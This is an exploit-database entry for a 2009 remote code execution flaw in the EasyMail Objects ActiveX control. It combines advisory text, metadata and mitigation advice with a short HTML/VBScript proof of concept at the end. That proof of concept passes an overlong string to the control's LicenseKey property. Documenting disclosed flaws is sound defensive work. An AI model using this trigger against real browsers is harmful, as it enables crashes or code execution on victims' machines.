Vendor: EasyMail Objects ActiveX Control
By: SecurityFocus
CVSS: 9.3 (HIGH)
Remote Code Execution
CWE: 94
Product Name: EasyMail Objects ActiveX Control
Affected Version From: EasyMail Objects 6.0.2.0
Affected Version To: Spam Inspector 4.0.354
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Internet Explorer
2009

EasyMail Objects ActiveX Control Remote Code Execution Vulnerability

EasyMail Objects ActiveX control is prone to a remote code-execution vulnerability because the application fails to properly sanitize user-supplied data. Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application (typically Internet Explorer) using the ActiveX control. Failed exploit attempts likely result in denial-of-service conditions.

Mitigation:

Users should avoid visiting untrusted websites and clicking on links provided by unknown or untrusted sources.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/36409/info

EasyMail Objects ActiveX control is prone to a remote code-execution vulnerability because the application fails to properly sanitize user-supplied data.

Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the application (typically Internet Explorer) using the ActiveX control. Failed exploit attempts likely result in denial-of-service conditions.

EasyMail Objects 6.0.2.0 is vulnerable; other versions may also be affected.
Spam Inspector 4.0.354 is vulnerable.

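<!-- Proof of concept from the advisory: instantiates the control by CLSID and assigns the string built by unescape() to its LicenseKey property -->
<HTML>
<object classid='clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D' id='target'></object>
<script language = 'vbscript'>
Scrap = unescape("http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA")
code = Scrap
target.LicenseKey = code
</script>
</HTML>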